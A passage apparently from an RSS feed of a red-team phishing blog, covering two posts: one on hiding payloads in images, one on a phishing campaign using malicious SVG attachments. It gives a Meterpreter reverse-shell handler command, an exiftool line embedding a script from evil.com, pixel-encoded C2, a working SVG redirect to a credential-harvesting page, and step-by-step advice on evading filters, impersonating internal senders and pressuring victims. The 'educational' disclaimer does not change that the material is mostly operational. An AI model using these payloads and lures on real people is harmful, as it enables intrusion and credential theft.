msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST your_ip; set LPORT 4444; exploit"

This handles incoming payload callbacks, establishing a Meterpreter session once the victim opens the image.

• Escalate control and gather information if needed:

sysinfo

Running

sysinfo

yields system information from the compromised machine, initiating further actions as desired.

Advanced Variations

JavaScript-Injected Image Technique

Instead of an executable, integrate JavaScript into image metadata to execute scripts on loading through browsers. This demands exacting control over image metadata and network injection points, typically in environments with relaxed cross-origin settings.

Utilize:

exiftool -Comment='<script src="http://evil.com/malicious.js"></script>' target_image.jpg

This alters the EXIF data, embedding a script reference that triggers execution on access.

Pixel-Based C2 Command Injection

Encode commands into specific pixel sequences read by compromised environments outfitted with pixel-reading malware, a tactic that sidesteps text-encoded command detection.

Translate commands to binary, then utilize:

convert -size 1x1 xc:"#000102" pixel.jpg

The

convert

command creates pixels where color values translate into data instructions processed by malware pre-equipped for such detection.

Do’s and Don’ts

• DO vary payload types: Use multiple vectors (JS, executables) to increase the chance of evasion and effectiveness. Example: Pairing payload delivery methods diversifies attack surface potential and hinders single-vector detection mechanisms.
• DON’T overlook file integrity checks: Always post-embed check images for corruption. Example: Alterations in file byte count can alert defenders prematurely, undermining campaign stealth.
• DO maintain domain credibility: Ensure sender domains pass DKIM/SPF checks. Example: A phishing email failing these protocols becomes a prime candidate for spam filtering, failing its intended reach.

Related Concepts

Understanding this technique links naturally to other payload delivery approaches like HTML smuggling and macro-laden document exploitation. By expanding to include QR code phishing or leveraging text-based payload engagers, red teams can construct layered attack paths that incorporate multiple vectors, crucial for crafting comprehensive engagements. Exploring concepts of lateral movement or privilege escalation post-execution can also enhance simulated adversary realism, inferring broader strategic use cases within organizational training exercises.

References

Analysis of Image-Based Exploit Distribution

Steganography Tools Overview

Implementation of Steganography

---

Related Reading

• Exploiting JPEG Payloads: The Return of Evil MSI Background
• What is a JPEG Payload in Phishing?
• New Wave of Phishing Emails Delivering Malicious SVG Files
• Incorporating Scalable Vector Graphics (SVG) in Phishing Campaigns

---

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

]]> 1837 https://phishandchips.io/new-wave-of-phishing-emails-delivering-malicious-svg-files/ Thu, 04 Jun 2026 16:00:50 +0000 https://phishandchips.io/new-wave-of-phishing-emails-delivering-malicious-svg-files/ Campaign or TTP Overview

In recent weeks, security researchers have identified a sophisticated phishing campaign employing a novel tactic: the use of malicious SVG files to deliver malware. These attacks have primarily targeted financial and healthcare sectors, exploiting weaknesses in traditional email security filters. The SVG format, commonly used for vector graphics, is harnessed to embed scripts capable of initiating harmful actions upon opening. The campaign, first observed in early October 2023, has been traced back to a threat actor group known for its expertise in manipulating file formats to evade detection.

The complexity and elegance of this attack lie in its ability to bypass numerous security checks that typically flag or block executable files or scripts. This methodology not only deceives automated filtering systems but also lures unsuspecting users into triggering harmful scripts. As reported by SANS Internet Storm Center, this phishing campaign is an example of how attackers continually develop advanced techniques to compromise security measures and gain unauthorized access.

How It Was Built

The attack infrastructure was meticulously constructed to exploit the inherent trust in SVG files. The delivery mechanism revolves around seemingly innocuous emails that blend in with regular corporate communication. These emails contain an attached SVG file disguising itself as legitimate content, such as a graphical report or a chart.

Subject lines like “Quarterly Performance Report: Immediate Review Required” and sender addresses mimicking internal domains (e.g.,

reports@company-hr.com

) enhance the email’s credibility. Once opened, the SVG file, which includes embedded JavaScript, automatically triggers, forwarding the victim to a phishing page resembling legitimate corporate sites to capture credentials or initiate malware download.

<svg xmlns="http://www.w3.org/2000/svg" width="300" height="200">

  <script type="application/ecmascript">

    <![CDATA[

      window.location.href = 'http://malicious-site.com/login';

    ]]&gt;

  &lt;/script&gt;

&lt;/svg&gt;

Why It Worked

Three main components contributed to the effectiveness of this phishing campaign:

• Trust in SVG files: SVG files are typically associated with safe, non-executable content. This intrinsic trust enabled the malicious SVG to slip through security solutions that primarily focus on more traditionally exploited formats like PDFs or Word documents.
• Realistic sender mimicry: By using lookalike domains and credible sender identities, the attackers successfully impersonated internal communication pathways, reducing suspicion among recipients.
• Engaging lure content: The subject lines and email body content were crafted to incite urgency and immediate action, a proven tactic that preyed on recipients’ instincts to react quickly to potential company-related issues.

Operator Takeaways

For a red teamer replicating this level of innovation, focusing on the less monitored vectors can yield significant engagement rates. This campaign highlights the importance of looking beyond conventional exploit formats and reinforcing the legitimacy of phishing bait through engaging and contextually relevant content. Additionally, developing infrastructure that mimics internal communication tools or channels adds an extra layer of deceit that can increase the likelihood of successful payload deployment.

Good / Better / Best

• Good: Utilize commonly trusted file formats that have the capacity to contain executable elements. Ensure the file adjacency aligns with the target organization’s common file usage habits.
• Better: Employ lookalike domains and credible sender impersonations for maximum plausibility, mirroring the target’s actual communication style and frequency.
• Best: Craft multi-layered phishing content that replicates internal pressure or urgency scenarios, enhancing the psychological propensity for targets to engage without due diligence.

References

• New Delivery Methods for Malicious HTML Files
• SVG-based Phishing Campaign Analysis

---

Related Reading

• What is an SVG File in the Context of Phishing?
• Incorporating Scalable Vector Graphics (SVG) in Phishing Campaigns
• Leveraging SVG Files in Phishing: Techniques and Countermeasures
• Understanding CAPTCHA Bypass Techniques in Phishing

---

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

]]> 1832